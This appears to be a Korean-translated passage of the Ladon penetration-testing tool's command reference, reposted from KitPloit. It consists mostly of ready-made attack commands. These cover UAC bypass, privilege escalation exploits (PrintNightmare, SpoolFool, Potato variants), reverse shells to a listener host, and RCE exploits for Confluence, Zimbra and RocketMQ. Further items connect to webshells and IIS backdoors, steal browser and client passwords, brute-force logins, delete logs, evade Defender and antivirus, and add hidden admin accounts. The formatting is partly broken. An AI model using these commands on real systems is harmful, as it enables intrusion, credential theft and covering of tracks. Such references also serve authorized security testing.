##### 109  6가지 화이트리스트BypassUAC(8.0 이후)Win7-Win10  10.8 버전에서 제거됨 911에만 유지됨
사용법: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2 UAC 실행 우회, Win7-Win10 지원 10.8 버전에서 제거됨 911에서만 유지```Bash

Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat

root@kitploit:~
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) 프린터 취약점 권한 상승 EXP```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 SpoolFool 프린터 취약점 권한 상승 EXP```Bash

Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll

root@kitploit:~
##### 113 GetSystem 권한 상승으로 System 권한으로 CMD 실행```Bash
Ladon GetSystem cmd.exe
114 토큰을 복사하여 CMD 실행(예: system 권한에서 explorer 현재 사용자로 권한 하향)```Bash

Ladon GetSystem cmd.exe explorer

root@kitploit:~
##### 115 Runas 사용자로 명령 실행```Bash
Ladon Runas user pass cmd
116 MS16135로 SYSTEM 권한 상승```Bash

Ladon ms16135 whoami >=9.2.1版本移除 911保留

root@kitploit:~
##### 117 BadPotato 서비스 사용자에서 SYSTEM으로 권한 상승```Bash
Ladon BadPotato cmdline
118 SweetPotato 서비스 사용자에서 SYSTEM으로 권한 상승```Bash

Ladon SweetPotato cmdline

root@kitploit:~
##### 119 EfsPotato Win7-2019 권한 상승(서비스 사용자 권한을 system으로 상승)```Bash
Ladon EfsPotato whoami
120 Open3389 원클릭 3389 활성화```Bash

Ladon Open3389

root@kitploit:~
##### 121 내장 관리자 Administrator 활성화```Bash
Ladon ActiveAdmin
122 내장 사용자 Guest 활성화```Bash

Ladon ActiveGuest

root@kitploit:~
### 리버스 셸

##### 123 리버스 TCP NC 셸```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
124 리버스 TCP MSF Shell```Bash

Ladon ReverseTcp 192.168.1.8 4444 shell

root@kitploit:~
##### 125 리버스 TCP MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
126 리버스 HTTP MSF MET Shell```Bash

Ladon ReverseHttp 192.168.1.8 4444

root@kitploit:~
##### 127 리버스 HTTPS MSF MET Shell```Bash
Ladon ReverseHttps 192.168.1.8 4444
128 리버스 TCP CMD & PowerShell Shell```Bash

Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

root@kitploit:~
##### 129 리버스 UDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 netsh 로컬 888 포트를 112의 22 포트로 전달```Bash

Ladon netsh add 888 192.168.1.112 22

root@kitploit:~
##### 131  PortTran 포트 포워딩(3389 예제)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

로컬 실행

132 RDP 데스크톱 세션 하이재킹 (비밀번호 불필요)```Bash

Ladon RdpHijack 3 Ladon RdpHijack 3 console

root@kitploit:~
##### 133 레지스트리 Run 시작 항목 추가```Bash
Ladon RegAuto Test c:\123.exe
134 AT 일정 실행 프로그램(시간 불필요)(system 권한)```Bash

Ladon at c:\123.exe Ladon at c:\123.exe gui

root@kitploit:~
##### 135 SC 서비스 시작 항목 추가&프로그램 실행(system 권한)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

시스템 정보 탐지

136 Snmp 프로토콜로 운영체제, 장치 등의 정보 탐지```Bash

Ladon 192.168.1.8/24 SnmpInfo

root@kitploit:~
##### 137  Nbt 프로토콜로 Windows 호스트 이름, 도메인, 사용자 탐지```Bash
Ladon 192.168.1.8/24 NbtInfo
138 Smb 프로토콜로 Windows 버전, 호스트명, 도메인 탐지```Bash

Ladon 192.168.1.8/24 SmbInfo

root@kitploit:~
##### 139  Wmi 프로토콜로 Windows 버전, 호스트 이름, 도메인 탐지```Bash
Ladon 192.168.1.8/24 WmiInfo
140 Mssql 프로토콜로 Windows 버전, 호스트명, 도메인 탐지```Bash

Ladon 192.168.1.8/24 MssqlInfo

root@kitploit:~
##### 141  Winrm 프로토콜로 Windows 버전, 호스트 이름, 도메인 탐지```Bash
Ladon 192.168.1.8/24 WinrmInfo
142 Exchange Windows 버전, 호스트명, 도메인 탐지```Bash

Ladon 192.168.1.8/24 ExchangeInfo

root@kitploit:~
##### 143  Rdp 프로토콜로 Windows 버전, 호스트명, 도메인 탐지```Bash
Ladon 192.168.1.8/24 RdpInfo

기타 기능

144 Win2008 원클릭 .net 3.5 활성화```Bash

Ladon EnableDotNet

root@kitploit:~
##### 145 내부 네트워크 사이트 HTML 소스 코드 가져오기```Bash
Ladon gethtml http://192.168.1.1
146 원클릭 미니 WEB 서버 침투 리스닝 전용 WEB 서버```Bash

Ladon web 80 Ladon web 80 dir

root@kitploit:~
외부 IP 획득(VPS에서 WEB을 시작하고, 대상이 ip.txt 또는 ip.jpg에 접속)
http://192.168.1.8/ip.txt

##### 147 getstr/getb64/debase64/savetxt(무출력 취약점 결과 반환)
##### 리스닝```Bash
Ladon web 800
제출 평문 반환```Bash

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

root@kitploit:~
##### Base64 암호화 결과```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64 결과 해독```Bash

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

root@kitploit:~
##### 148 Shiro 플러그인 탐지```Bash
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat Tomcat 지정 IP 로그 삭제```Bash

Ladon LogDelTomcat access.log 192.168.1.8

root@kitploit:~
##### 150 C# 사용자 지정 어셈블리 플러그인 스캔```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
151 ReadFile 대용량 파일 앞부분에서 지정된 길이의 내용 읽기```Bash

Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M

root@kitploit:~
##### 152 레지스트리를 수정하여 2012 및 이후 시스템의 평문 비밀번호 읽기```Bash
Ladon SetMzLogonPwd 1
153 레지스트리 수정을 통한 서명 비자 하이재킹```Bash

Ladon SetSignAuth 1

root@kitploit:~
##### 154 IP24 대량 IP를 ip24 형식으로 변환(192.168.1.1/24)```Bash
Ladon ip.txt IP24
155 IPC IP를 ip C 형식으로 일괄 변환(192.168.1.)```Bash

Ladon ip.txt IPC

root@kitploit:~
##### 156 IPB  일괄 IP를 IP B 형식(192.168.)으로 변환```Bash
Ladon ip.txt IPB
157 취약점 탐지 Atlassian Confluence CVE-2022-26134```Bash

Ladon url.txt CVE-2022-26134

root@kitploit:~
##### 158 Atlassian Confluence CVE-2022-26134 EXP```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134 리버스 Shell```Bash

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

root@kitploit:~
##### 160 SslInfo 인증서 탐지 장치, IP, 도메인 이름, 머신 이름, 조직 등의 정보```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo 인증서 일괄 탐지: 디바이스, IP, 도메인, 머신 이름, 조직 정보 등```Bash

Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo

root@kitploit:~
##### 162 WPinfo 여러 가지 방법으로 WordPress 메인 프로그램, 테마, 플러그인 버전 획득```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo WordPress 메인 프로그램, 테마, 플러그인 버전 일괄 가져오기```Bash

Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo

root@kitploit:~
##### 164  Exchange 무차별 대입 공격 Exchange 비밀번호 무차별 대입 식별```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
165 CVE-2022-27925 Zimbra 메일 서버 ZIP 디렉터리 트래버설 RCE 취약점 대량 탐지```Bash

Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925

root@kitploit:~
##### 166 EXP-2022-27925 Zimbra 메일 서버 미인증 RCE 취약점 EXP GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd jsp WebShell 연결(cd, k8, ua, uab64 지원)```Bash

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### JSP UAshell 시스템 버전, python, gcc 등의 정보를 확인하여 권한 상승에 용이```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd jsp WebShell 접속(cd, k8, ua, uab64 지원)```Bash

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### 169 비대화형 IIS-Raid 백도어 연결 명령 실행```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIP IP 대역이 취약점 결과에 나타나는지 매칭```Bash

Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)

root@kitploit:~
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 라우터 비밀번호 읽기```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
172 PrinterPoc 프린터 PJL 임의 코드 실행 취약점 일괄 탐지```Bash

Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc

root@kitploit:~
##### 173 Mac을 통한 제조업체 조회(Ladon Mac MAC 주소)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 Cisco VPN 라우터 비밀번호 무차별 대입(내장 기본 비밀번호, 평문·Hash 지원)```Bash

Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan​

root@kitploit:~
##### 175 vsFTPdPoc	CVE-2011-2523 vsftpd 2.3.4 스마일리 백도어 취약점 탐지  10.9 제거```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc  
176 WpScan WordPress 비밀번호 감사, 약한 비밀번호```Bash

Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://

root@kitploit:~
##### 177  Exchange 버전 탐지```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 Exchange 고위험 RCE 취약점 탐지```Bash

Ladon https://192.168.1.8 ExchangePoc

root@kitploit:~
##### 179 Http/S 웹페이지 응답 헤더 정보 가져오기```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://
180 Http/S 웹 페이지 응답 헤더 정보 가져오기+소스 코드```Bash

Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://

root@kitploit:~
##### 181 Http/S 웹 페이지에서 도메인 이름 가져오기```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://
182 TrueIP CDN 우회로 도메인 실제 IP 획득 (도메인, 제목, Banner 등 고유 키워드 특징 사용 가능)```Bash

Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 183 Firefox 비밀번호\Cookie\방문 기록 읽기```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11 무출력, Win7, Win8, Win11 Win2012\2016\2019 등 지원, 10.8 버전에서 제거됨```Bash

Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe

root@kitploit:~
##### 185 GetPwd는 Navicat, TeamView, Xshell, SecureCRT 비밀번호 읽기를 지원합니다```Bash
Ladon GetPwd
186 DraytekScan 비밀번호 감사 Draytek 약한 암호 감지```Bash

Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan

root@kitploit:~
##### 187 XshellPwd Xshell 비밀번호 읽기```Bash
Ladon XshellPwd
188 FortiGate CVE-2022-40684 무단 SSH-KEY 쓰기 admin admin123```Bash

Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684

root@kitploit:~
##### 189 MssqlCmd  SQL Server 원격 명령 실행 SQL 버전, OS 정보 xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd SQL Server 원격 명령 실행 efspotato, badpotato 권한 상승```Bash

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

root@kitploit:~
##### 191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42 버전 비밀번호 읽기```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan ZTE 라우터 광모뎀 Web 기본 비밀번호 탐지```Bash

Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan

root@kitploit:~
##### 193 MSNSwitchPwd CVE-2022-32429 MSNSwitch 라우터 비밀번호 읽기```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd NetGear DGND3700v2 라우터 비밀번호 읽기```Bash

Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd

root@kitploit:~
##### 195 T3 프로토콜 WebLogic 버전 탐지```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

원클릭 침투 InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan 다중 모듈 시스템 정보 탐지```Bash

Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan

root@kitploit:~
##### 197 VulScan PocScan 다중 원격 취약점 탐지```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan 다중 취약점 악용 GetShell```Bash

Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan

root@kitploit:~
##### 199 JoomlaPwd CVE-2023-23752 무단 웹사이트 데이터베이스 비밀번호 읽기```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan 모든 모듈```Bash

Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan

root@kitploit:~
##### 201 Citrix Gateway 버전 탐지```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 Vmware Vcenter 버전 탐지```Bash

Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer

root@kitploit:~
##### 203 Defender 우회하여 PowerShell 실행```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
204 SNMP로 HP 프린터 재시작```Bash

Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public

root@kitploit:~
##### 205 작업 로그 정리 .NET 로깅 비활성화```Bash
Ladon Clslog
206 ARP 프로토콜 기반 활성 호스트 탐지```Bash

Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo

root@kitploit:~
##### 207 미니 FTP 서버,(Windows/Linux 기본 ftp 명령 지원하여 파일 업로드/다운로드 구현)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 TCP 발신 패킷 데이터 모니터링, TXT 및 HEX 저장, SMB RDP HTTP SSH LDAP FTP 등 프로토콜```Bash

Ladon Tcp 8080 Ladon TcpServer 80

root@kitploit:~
##### 209 UDP 송신 패킷 데이터 모니터링  TXT 및 HEX로 저장  DNS, SNMP 등 프로토콜```Bash
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward 포트 포워딩 포트 중계```Bash

Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338

root@kitploit:~
##### 211 CVE-2022-36537	Server Backup Manager 무단 RCE 취약점 탐지 (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
212 EXP-2022-36537 Zookeeper 무단 파일 읽기 EXP (기본/WEB-INF/web.xml)```Bash

Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml

root@kitploit:~
##### 213 SMB 완전 종료, 445 비활성화, 0day 차단, 측면 이동, 릴레이 공격 등```Bash
Ladon CloseSMB
214 지정된 서비스 비활성화```Bash

Ladon DisService Spooler Ladon DisableService Spooler

root@kitploit:~
##### 215 지정 서비스 중지```Bash
Ladon StopService Spooler
216 포트 허용 포트 개방```Bash

Ladon OpenTCP 445 Ladon OpenUDP 161

root@kitploit:~
##### 217 포트 차단 포트 차단```Bash
Ladon CloseTCP  445
Ladon CloseUDP  161
218 RunToken 토큰 복사 실행 프로그램```Bash

Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat

root@kitploit:~
##### 219 RunSystem 권한 상승 관리자 권한을 SYSTEM 권한으로 승격```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 RunUser 권한 하향 System 권한을 사용자 프로그램 실행으로 낮춤```Bash

Ladon RunUser cmd.exe Ladon RunUser c:\1.exe

root@kitploit:~
##### 221 GodPotato 권한 상승 Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
222 hikvision 하이크비전 비밀번호 감사```Bash

Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan

root@kitploit:~
##### 223 hikvision 하이크비전 CVE-2017-7921 취약점 탐지```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision 하이크비전 설정 파일 복호화```Bash

Ladon HikvisionDecode configurationFile

root@kitploit:~
##### 225 Ladon 테스트 전용 CmdShell```Bash
Ladon web 800 cmd
226 연결 테스트 전용 CmdShell```Bash

Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami

root@kitploit:~
##### 227 도메인 관리자 보기```Bash
Ladon QueryAdminDomain
228 도메인 정보 보기```Bash

Ladon QueryDomain

root@kitploit:~
##### 229 Mndp 프로토콜 브로드캐스트로 동일 네트워크 세그먼트의 Mikrotik 라우터 정보 탐지```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
230 PostShell 연결 도구, 사용자 지정 HTTP 헤더 제출 지원```Bash

Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p

root@kitploit:~
##### 231 RunCmd/Cmd  Cmd 명령 실행/b64cmd 지원```Bash	
Ladon cmd whoami
Ladon b64cmd d2hvYW1p 
232 관리자 IP 보기, 원클릭 로그인 성공 로그 4624 읽기```Bash

Ladon LoginLog Ladon EventLog

root@kitploit:~
##### 233 Apache RocketMQ CVE-2023-33246 원격 명령 실행 취약점 EXP```Bash	
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
234 Ladon 원클릭 백신 우회 도구```Bash

Ladon BypassAV py xor anyNet.exe

root@kitploit:~
##### 235 Win11/2022 system 권한으로 권한 상승```Bash	
Ladon McpPotato whoami
236 EXE를 HEX로 변환, CMD 명령으로 파일에 기록```Bash

Ladon Exe2Hex 1.exe

root@kitploit:~
##### 237 EXE를 Base64로 변환, CMD 명령으로 파일에 쓰기```Bash	
Ladon Exe2B64 1.exe
238 ZimbraVer Zimbra 메일 시스템 버전 탐지```Bash

Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer

root@kitploit:~
##### 239 SharpGPO 도메인 침투 그룹 정책 횡적 이동 도구```Bash	
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"

Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,CN=Users,DC=testad,DC=com" --DstDN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action MoveObject --SrcDN "CN=user01,OU=IT Support,DC=testad,DC=com" --DstDN "CN=Users,DC=testad,DC=com"

Ladon SharpGPO --Action RemoveOU --OUName "IT Support"
Ladon SharpGPO --Action RemoveOU --DN "OU=IT Support,DC=testad,DC=com"


Ladon SharpGPO --Action GetGPO
Ladon SharpGPO --Action GetGPO --GPOName testgpo

Ladon SharpGPO --Action NewGPO --GPOName testgpo

Ladon SharpGPO --Action RemoveGPO --GPOName testgpo
Ladon SharpGPO --Action RemoveGPO --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetGPLink
Ladon SharpGPO --Action GetGPLink --DN "OU=IT Support,DC=testad,DC=com"
Ladon SharpGPO --Action GetGPLink --GPOName testgpo
Ladon SharpGPO --Action GetGPLink --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action NewGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GPOName testgpo
Ladon SharpGPO --Action RemoveGPLink --DN "OU=IT Support,DC=testad,DC=com" --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action GetSecurityFiltering --GPOName testgpo
Ladon SharpGPO --Action GetSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8

Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action NewSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"

Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GPOName testgpo --NTAccount "Authenticated Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainUser Alice
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainGroup "Domain Users"
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --DomainComputer WIN-SERVER
Ladon SharpGPO --Action RemoveSecurityFiltering --GUID F3402420-8E2A-42CA-86BE-4C5594FA5BD8 --NTAccount "Authenticated Users"
240 IIS 웹사이트 정보 원클릭 획득```Bash

Ladon IisInfo

root@kitploit:~
##### 241 침투 테스트 전용 웹 서버 LDAP 역직렬화```Bash	
Ladon web 800 ldap=192.168.1.8:800
242 침투 테스트 전용 WEB 서버 RMI 역직렬화```Bash

Ladon web 800 rmi=192.168.1.8

root@kitploit:~
##### 243 API 관리자 추가(시스템 net, net1 비활성화 무시)```Bash	
Ladon AddAdmin admin$ 123456
244 API 사용자 추가(시스템 net, net1.exe 비활성화 무시)```Bash

Ladon AddUser admin$ 123456

root@kitploit:~
##### 245 API 사용자 삭제(시스템 net, net1.exe 비활성화 무시)```Bash	
Ladon DelUser admin$
246 Rubeus 도메인 침투 Kerberos 공격

예를 들어 TGT 요청/ST 요청/AS-REP Roasting/Kerberoasting/위임 공격/골든 티켓/실버 티켓/다이아몬드 티켓/사파이어 티켓 등```Bash Ladon Rubeus

root@kitploit:~
##### 247 noPac 도메인 침투 도메인 내 권한 상승 CVE-2021-42287/CVE-2021-42278```Bash	
CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter

/domain /user /pass argument needed for scanning
/dc /mAccount /nPassword argument needed for exploitation

Examples:
  Ladon.exe noPac scan -domain htb.local -user domain_user -pass 'Password123!'
